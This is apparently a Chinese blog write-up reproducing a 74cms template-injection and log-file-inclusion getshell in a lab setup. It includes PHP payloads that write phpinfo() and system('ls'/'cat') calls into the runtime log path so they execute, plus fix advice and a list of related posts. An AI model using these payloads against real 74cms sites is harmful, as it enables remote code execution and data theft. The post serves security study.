74cms v6.0.48模版注入+文件包含getshell复现
漏洞描述
74cms由于函数过滤不严格导致攻击者可以通过构造执行任意代码
影响版本
骑士 CMS < 6.0.48
风险等级
高
漏洞环境搭建
74 cms: 74cms_Home_Setup_v6.0.20.zip
系统:ubuntu18.04.5
php环境:php 5.6
系统镜像:http://old-releases.ubuntu.com/releases/
web源码下载:https://www.74cms.com/download/index.html
准备好后直接把源码放到var/www/html目录下傻瓜式下一步下一步!
漏洞复现
① 首先构造含有phpinfo()函数的POST包:
<?php phpinfo(); ob_flush();?>/r/n
/var/www/html/data/Runtime/Logs/Home/Y_M_D.log
② 然后POST方式直接访问该日志文件,得到phpinfo的具体信息,得知一些禁用的php函数
③ 按照上述1、2的方式通过构造未禁用的函数,进行命令执行得到flag
<?php system('ls /var/www/html'); ob_flush();?>/r/n<?php system('cat /var/www/flag3'); ob_flush();?>/r/n
访问/var/www/html/data/Runtime/Logs/Home/Y_M_D.log执行写入日志文件的命令
4)flag利用截图
<?php phpinfo(); ob_flush();?>/r/n
/var/www/html/data/Runtime/Logs/Home/Y_M_D.log
<?php system('ls /var/www/'); ob_flush();?>/r/n
!此时,这将作为一条日志写在默认的可执行的日志路径下:
/var/www/html/data/Runtime/Logs/Home/Y_M_D.log
<?php system('cat /var/www/flag3'); ob_flush();?>/r/n
访问/var/www/html/data/Runtime/Logs/Home/Y_M_D.log执行
修复建议
- 升级到最新版本
- 对函数做严格的过滤
74cms v6.0.48模版注入+文件包含getshell复现相关推荐
- 骑士CMS模版注入+文件包含getshell复现
声明 好好学习,天天向上 漏洞描述 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统.软件具执行效率高.模板自由切换.后台管理功能方便等诸多优秀特点. 骑 ...
- (环境搭建+复现)74CMS模版注入+文件包含getshell
0x00 简介 骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案. 0x01 漏洞概述 骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞. ...
- 骑士cms文件包含getshell复现
00X1 测试环境 骑士 CMS 6.0.48以下均存在此漏洞,本文复现使用骑士cms 6.0.20,下载地址: http://www.74cms.com/download/index.html 注意 ...
- index.php.bak 颓废_CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现
CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现 By:Mirror王宇阳 漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞.该漏洞来自一部分代码,其 ...
- [HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell)
[HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell) [HXBCTF 2021]easywill 1.WillPHP ...
- cms php vue 开源_骑士CMS文件包含+getshell
0x00简单介绍 骑士cms人才系统,是一项基于php+mysql为核心的开源人才网站系统. 0x01漏洞概述 骑士cms官方发布安全更新,修复了一处远程代码执行漏洞.由于骑士cms某些函数过滤不严谨 ...
- [网络安全自学篇] 四十.phpMyAdmin 4.8.1后台文件包含缺陷复现及防御措施(CVE-2018-12613)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文通过两个题目分享了DirBuster扫描目录.Fuzzy爆破指定路径名称,通 ...
- phpmyadminV4.8.1本地文件包含漏洞复现
文章目录 一.phpMyadmin简介 二.什么是文件包含漏洞? 三.本地包含和远程包含 四.文件包含相关函数介绍 1.函数介绍 2.报错 3._once 4.小结 五.关于windows特性的一个小 ...
- CVE-2020-1938 Aapache Tomcat AJP文件包含漏洞复现
目录 一.环境搭建 1.下载vulhub 2.启动环境 二.漏洞复现 1.使用nmap扫描目标 2.运行POC验证漏洞 3.POC代码 三.修复方法 一.环境搭建 1.下载vulhub kali系统输 ...
- php文件包含漏洞复现,文件包含漏洞(绕过姿势)
当你的才华 还撑不起的野心时 那你就应该静下心来学习 目录 文件包含漏洞介绍 特殊姿势 亲测有效 php文件包含漏洞 本地包含漏洞(LFI) 远程包含漏洞 文件包含利用 读取敏感信息 远程包含shel ...
最新文章
- 全球UML模型共享设计下载中心--www.euml.org上线
- android sqlite 中 创建表 不要使用 IF NOT EXISTS + TA...
- Python-random标准库知识小结
- python学习日记day2
- a8处理器相当于骁龙几_天玑820相当于骁龙什么处理器?天梯图秒懂联发科天玑820性能排名...
- C#深入浅出 关键字(一)
- android 字符串 时间格式化,Android 获取年月日时分秒 格式化指定时间字符串
- 【Clickhouse】Clickhouse Live View
- 使用 Redis 实现 Session 共享
- 谈谈linux内核原理,谈谈Linux内核驱动的coding style
- 又有无人车数据集开源,2019段加州通勤小视频等你撩 | 资源
- 百度发起机器阅读理解竞赛,提供中文数据集,获胜团队奖10万
- google四件套之Dagger2。从入门到爱不释手,之:Dagger2进阶知识及在Android中使用
- H桥电机驱动电路详解
- 如何导入python标准库_Python标准库需要导入吗
- 数据可视化之地图可视化
- 怎样统计PPT演示文稿的字数
- 企业数据总线(ESB)和注册服务管理(dubbo)的区别{{1033}}
- 银行业智能运维的探索与实践
- 如何快速定位BUG?BUG定位技巧及测试人员定位的N板斧